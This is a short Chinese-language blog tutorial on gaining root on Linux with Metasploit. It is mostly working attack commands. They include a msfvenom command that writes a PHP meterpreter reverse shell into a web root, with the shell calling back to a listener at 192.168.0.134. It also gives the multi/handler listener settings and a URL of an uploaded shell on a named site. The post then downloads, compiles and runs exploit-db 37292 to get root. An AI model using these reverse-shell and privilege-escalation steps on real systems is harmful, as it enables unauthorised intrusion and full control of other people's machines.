欢迎来到【血梦博客】 今天是:2020年08月06日 星期四
站长联系QQ:635948183
当前位置: 网站首页> 提权教程> 提权教程:metasploit linux提权

提权教程:metasploit linux提权

作者:血梦 日期:2020-03-17 浏览:142分类: 提权教程 已提交百度收录

1、简介

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
2、使用metasploit linux提权

生成攻击载荷

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.134 LPORT=12345 -f raw > /var/www/html/shell.php


本地监听

use exploit/multi/handler

set payload php/meterpreter_reverse_tcp

set lhost 192.168.0.134

set lport 12345

exploit


shel.php 的内容

1.png反弹shell

http://www.moontester.com//upload/shellx.php

在metasploit设置好监听模块 访问shellx.php 就会获取一个session

 2.png

3png.png

3、提权命令

 

getuid 查看当前用户

shell 使用终端

https://www.exploit-db.com/exploits/37292

gcc 37292.c -o exp

chmod +x exp

./exp


如果成功就会得到一个root

 4.png

关灯